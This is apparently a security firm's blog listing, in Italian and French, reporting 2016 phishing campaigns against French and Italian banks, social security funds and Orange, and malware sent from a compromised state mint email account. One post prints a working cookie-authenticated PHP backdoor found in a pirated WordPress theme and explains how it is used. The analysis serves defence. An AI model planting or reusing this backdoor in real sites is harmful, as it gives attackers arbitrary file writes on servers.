D3Lab

Phishing aux dépens du Groupe Crédit Mutuel

3Le Crédit Mutuel est l’un des principaux groupes bancaires français, qui bénéficie de la participation de plusieurs autres instituts et groupes bancaires.

La présence de plusieurs instituts bancaires au sein d’un seul groupe, qui peuvent utiliser la même plateforme d’internet banking, permet aux phishers les plus expérimentés de réaliser des campagnes de phishing visant à attaquer au moyen de l’envoi d’un seul courriel les titulaires d’un compte dans les différents instituts qui font partie du groupe.

Le monitorage actuel a permis de relever au cours des premières heures de la nuit un cas de phishing qui, exploitant ce schéma, a des retombées sur les clients du:

Crédit Mutuel de Bretagne (CMB);
Crédit Mutuel Massif Central (CMMC);
Crédit Mutuel Sud Ouest (CMSO);
BPE;Arkéa Banque Privée (ABP);
Fortunéo;
BEMIX

La page frauduleuse sur laquelle aboutiront les «victimes» après avoir cliqué sur le lien Continua a leggere

3 Ottobre 2016/da Denis D3Lab

Phishing a danno del Gruppo Crédit Mutuel

Phishing

Crédit Mutuel è uno dei principali gruppi bancari francesi, partecipato diversi altri istituti e gruppi bancari.

La presenza di più istituti bancari in un unico gruppo, che fanno magari uso della medesima piattaforma di internet banking, consente ai phisher più agguerriti di realizzare campagne di phishing volte a colpire con l’invio di una singola mail i correntisti dei vari istituti facenti parte del gruppo.

Il monitoraggio odierno ha permesso di rilevare nella prime ore della notte un caso di phishing che sfruttando tale schema va ad impattare sui clienti di

Credit Mutuel de Bretagne (CMB)
Credit Mutuel Massif Central (CMMC)
Credit Mutuel Sud Ouest (CMSO)
BPE
Arkéa Banque Privée (ABP)
Fortunéo
BEMIX

Continua a leggere

3 Ottobre 2016/da Denis D3Lab

Phishing aux dépens de la Sécurité Sociale française

Non categorizzato, Non classifié(e)

En France la Sécurité Sociale est divisée en trois secteurs principaux:

Maladie, maternité, invalidité et décès, accidents du travail et maladies professionnelles;
vieillesse;
famille;

gérée par trois différentes institutions:

la Caisse nationale d’assurance maladie maternité des travailleurs salariés (la CNAMTS), s’occupe du premier;
la Caisse nationale d’assurance vieillesse (CNAV) du second;
la Caisse nationale des allocations familiales (CNAF) du troisième.

En effectuant le monitorage du phishing international, le D3Lab a relevé, à partir de 2013, un intérêt des criminels pour la Caisse Nationale des Allocations Familiales,

Continua a leggere

29 Settembre 2016/da Denis D3Lab

Phishing a danno delle Casse di previdenza francesi

Phishing

In Francia la previdenza sociale è suddivisa in tre settori principali:

malattia, maternità, invalidità e morte, infortuni sul lavoro e malattie professionali;
vecchiaia;
famiglia;

gestiti da tre differenti enti:

la Cassa nazionale di assicurazione malattia dei lavoratori dipendenti (Caisse nationale d’assurance maladie maternitédes des travailleurs salariés), abbreviato CNAMTS, si occupa del primo;
la Cassa nazionale di assicurazione vecchiaia (Caisse nationale d’assurance vieillesse, CNAV ) del secondo;
la Cassa nazionale degli assegni familiari (Caisse nationale des allocations familiales, CNAF ) del terzo.

Monitorando il phishing internazionale D3Lab aveva rilevato sin dal 2013 l’interesse dei criminali per la Caisse nationale des allocations familiales,

Continua a leggere

29 Settembre 2016/da Denis D3Lab

Tema WordPress Warez e Backdoor con autenticazione via Cookie

Phishing

È ormai una notizia nota che i Temi o i Plugin di WordPress scaricati in maniera illegale, senza corrispondere il corretto compenso allo sviluppatore, contengano spesso Backdoor o Shell nascoste pronte per essere sfruttate per accedere al sito. Nonostante ciò la diffusione di tale materiale è ancora elevata e non mancano certamente gli utilizzatori che pur di risparmiare qualche euro mettano a repentaglio la sicurezza dei propri siti.

La scorsa settimana un sito internet Australiano è stato attaccato e sfruttato per diffondere Phishing ai danni di CartaSi. In collaborazione con il provider abbiamo analizzato il sito web e i relativi LOG per permettergli di contrastare l’accesso abusivo al dominio. Fin da subito abbiamo identificato l’utilizzo di un tema commerciale probabilmente scaricato da siti warez, vista la presenza del file: MafiaShare.net.txt nella directory del tema.

Successivamente analizzando tutti i file che compongono il tema abbiamo rilevato una backdoord nascosta utilizzabile solo a seguito di autenticazione, realizzata attraverso la lettura di Cookie. La backdoor scritta in PHP permette ad un utente malevolo di scrivere nuovi file sulla spazio web con contenuto arbitrario.

Il file in analisi, che vedete nell’immagine di apertura, è così composto:


/*
Plugin Name: [OMESSO]
Description: A plugin that show posts in column, featured image suported. Responsive supported.
Version: 1.0
Author: [OMESSO]
Author URI: http://www.[OMESSO].com/
*/

&lt;?php
$trenz=$_COOKIE['cookie_name'];
$jban1=$_POST["jban1"];
$jban2=$_POST["jban2"];
$wp_editer=$_POST["wp_editer"];
$jban3=$_POST["jban3"];
if ((isset($trenz)) and ($trenz=="mypassword") and (isset($jban1)))
{
$wp_hasher=&nbsp; $wp_editer($jban1,$jban2);
$jban3=stripslashes($jban3);
fwrite ($wp_hasher,$jban3);
}
if ((isset($trenz)) and ($trenz=="test"))
{
echo "Testing";
}
?&gt;

Accedendo al fine senza inviare alcuna richiesta POST apparirà la porzione di testo commentata, poiché non correttamente indentato, che fa presupporre la legittimità del file. Ma realmente il file permette di creare nuovi file dal contenuto ed estensione arbitrarie. Per far ciò è però fondamentale creare un Cookie denominato cookie_name contenente il valore mypassword, il precedente script identifica tale cookie e se presente proseguirà nella lavorazione dei parametri POST passati. Parametri che conterranno il nome del file e il suo contenuto.

Quando si sviluppa un sito Internet in WordPress, ma non solo, è quindi fondamentale utilizzare Temi o Plugin distribuiti dai canali ufficiali acquistando ove necessario le relative licenze.

28 Settembre 2016/da Andrea Draghetti

Phishing aux dépens d’Orange FR

Non categorizzato, Non classifié(e)

L’activité de monitorage au niveau international a permis au D3Lab de relever de nombreuses attaques de phishing aux dépens d’Orange S.A., la plus grande société de télécommunications française opérant dans le domaine de la téléphonie mobile fixe et comme fournisseur d’accès Internet, une des principales entreprises mondiale dans ce secteur.

On relève une augmentation considérable des attaques gérées depuis 2014, notamment cette année, où on compte 412 cas avérés jusqu’à aujourd’hui.

Continua a leggere

28 Settembre 2016/da Denis D3Lab

Phishing a danno di Orange FR

Phishing

L’attività di monitoraggio a livello internazionale ha consentito a D3Lab di rilevare numerosi attacchi di phishing a danno di Orange S.A., la maggior società di telecomunicazioni francese operante nel campo della telefonia mobile, fissa e quale internet service provider, una delle principali aziende mondali del settore.

Gli attacchi gestiti dal 2014 rilevano un notevole incremento soprattutto quest’anno con 412 casi acquisiti sino ad oggi.

Continua a leggere

28 Settembre 2016/da Jessica D3Lab

Phishing ai danni di Santander Consumer Bank

Non categorizzato

Il Banco Santander è un gruppo bancario di origine spagnola operante principalmente in Spagna ed in Sud America. Tale gruppo risulta tuttavia operante anche in altri paesi europei come Germania ed Italia dove è presente come Santander Consumer Bank (per essere precisi in Germania come Santander Consumer Bank AG).

Durante la notte, svolgendo l’analisi di un caso di phishing a danno di clienti D3Lab abbiamo individuato sul medesimo host, realizzati con le medesime modalità, altri due siti clone relativi a Banca Popolare di Spoleto (Phishing ai danni della Banca Popolare di Spoleto) ed a Santander Consumer Bank, ramo italiano del gruppo spagnolo.

si tratta in entrambi i casi di enti che in base ai rilievi D3Lab non erano ancora stati aggrediti dai criminali, almeno non in tempi recenti.

La modalità con cui l’attacco è strutturato è piuttosto insidiosa in quanto consente ai criminali, sfruttando il tag meta del codice html, di visualizzare nella barra degli indirizzi del browser un url

posticcio, che può essere fatto coincidere con l’effettivo url del portale di internet banking dell’istituto al fine di potenziare l’inganno ai danno delle potenziali vittime che potrebbero non far caso alla dicitura data:text/html: che precede l’indicazione del corretto protocollo https o http nel caso di uso di frame da parte degli istituti.

Lo screenshot di apertura, che evidenzia con colori questa particolarità del testo visibile nella barra degli indirizzi, mostra come i criminali siano interessati ai dati di accesso all’account di internet banking: nella prima pagina fraudolenta infatti richiedono il codice utente, lo user name, ed i caratteri 1, 2, 5, 7 e 10 della password. Inviati tali dati a pagine php residenti in altro host compromesso gli uetenti visualizzano una seconda pagina fraudolenta in cui oltre al

codice utente (già richiestogli) devo inserire i caratteri 3, 4, 6,8 e 9 della password, asteriscati nella prima richiesta, fornendo così ai criminali, con questo secondo inserimento di dati, tutti e 10 i caratteri della password.

Non ci è dato sapere se tali informazioni siano sufficienti ai criminali per disporre operazioni, ma anche non lo fossero il solo fatto che abbiano investito tempo e risorse nella realizzazione del kit lascerebbe ipotizzare che grazie alle informazioni che potrebbero carpire dall’account utente sia per loro possibile avviare per passi successivi ulteriori azioni fraudolente, magari con contatti telefonici nei confronti delle vittime.

Si raccomanda agli utenti la massima attenzione.

20 Settembre 2016/da Denis D3Lab

Phishing ai danni della Banca Popolare di Spoleto

Phishing

Durante l’analisi notturna abbiamo individuato un nuovo ente coinvolto nel Phishing, la Banca Popolare di Spoleto appartenente al Gruppo Banco Desio è un nuovo target per i Phisher e per i relativi cliente della banca.

Il kit sfrutta la codifica base64 per offuscare il sito internet utilizzato per diffondere il Phishing, l’utente riceve una eMail contenete uno short-link che rimanda ad una pagina PHP caricata su un sito compromesso tale pagina inoltrerà nuovamente l’utente ad una pagina locale generata sfruttando la capacità dei recenti browser di visualizzare e decodificare una pagina html in base64. Come è possibile notare nell’immagine di apertura nella barra dell’indirizzo non è presente un normale URL ma una porzione della stringa che genera la pagina HTML locale, per offuscare ulteriormente il tentativo di Phishing la stringa riporta inizialmente https://ihb2.cedaci.it/… che è effettivamente il sito legittimo del homebanking.

Invitiamo come di consueto gli utenti alla massima attenzione quando ricevono eMail di richiesta convalida credenziali.

20 Settembre 2016/1 Commento/da Andrea Draghetti

Diffusione Malware da account eMail della Zecca dello Stato

Malware

L’Infografica in apertura riepiloga quanto rilevato durante il monitoraggio quotidiano della diffusione del Phishing e Malware, in data 6 Settembre 2016 è avvenuto un tentativo di diffusione malware sfruttando un legittimo account eMail dell’Istituto Poligrafico e Zecca dello Stato e i suoi server mail. L’eMail richiedeva all’utente il pagamento di una fattura arretrata indicando che poteva visualizzare tutti i dettagli nel file allegato.

Fortunatamente è intervenuto il server eMail della Zecca dello Stato che ha rilevato l’invio di un contenuto malevolo, procedendo quindi a “troncare” l’archivio impedendo la diffusione del file Roma-Consulting.wsf che probabilmente avrebbe effettuato il download di un eseguibile ed eseguito. Nonostante il vano tentativo, gli aggressori potrebbero cambiare il metodo di diffusione per aggirare i controlli del server eMail; basti pensare alla richiesta di visitare un sito internet contenente un eseguibile (per esempio abbiamo visto sfruttare questa tecnica ai danni di GLS) piuttosto che allegarlo.

La nostra attenzione è ricaduta sul server sfruttato per inviare l’eMail, falsificare il mittente di una eMail è notoriamente facile ma se la mail e il server mittente coincide con il dominio della mail vi sono soltanto due possibili spiegazioni. Hanno violato il server o hanno violato l’account. Dal medesimo server eMail non abbiamo ricevuto nessun altro genere di comunicazione malevola (phishing, spam, ecc) e pertanto la nostra attenzione si è soffermata sulla seconda ipotesi.

Nascono ora due distinte possibilità di attacco, la vittima è stata infettata da un Trojan che ha provveduto ad inviare le Mail a sua insaputa o a diffondere la password del suo account. Oppure l’utente ha sfruttato la stessa password dell’account aziendale anche per altri servizi. Negli ultimi mesi nel Deep Web, ma non solo, si stanno diffondendo importanti archivi di password e account provenienti dai più noti portali online, Linkedin è probabilmente l’esempio più lampante ma non scordiamoci di DropBox, Trenitalia, Badoo, MySpace e mentre scriviamo questo articolo anche la più utilizzata eMail Italiana, Libero, ha comunicato che il suo database è stato violato.

Abbiamo verificato nel Database di Linkedin e come è possibile visualizzare dall’Infografia la casella eMail sfruttata per inviare il malware è presente e anche la sua relativa password, oltre ad essa sono presenti altre 46 caselle della Zecca dello Stato.

È quindi possibile che l’utente in questione sfrutti la medesima password per accedere alla Casella di Posta Elettronica della Zecca dello Stato sia su Linkedin, gli attaccanti hanno sfruttato questa debolezza per inviare diverse eMail da un mail server autorevole.

7 Settembre 2016/da Andrea Draghetti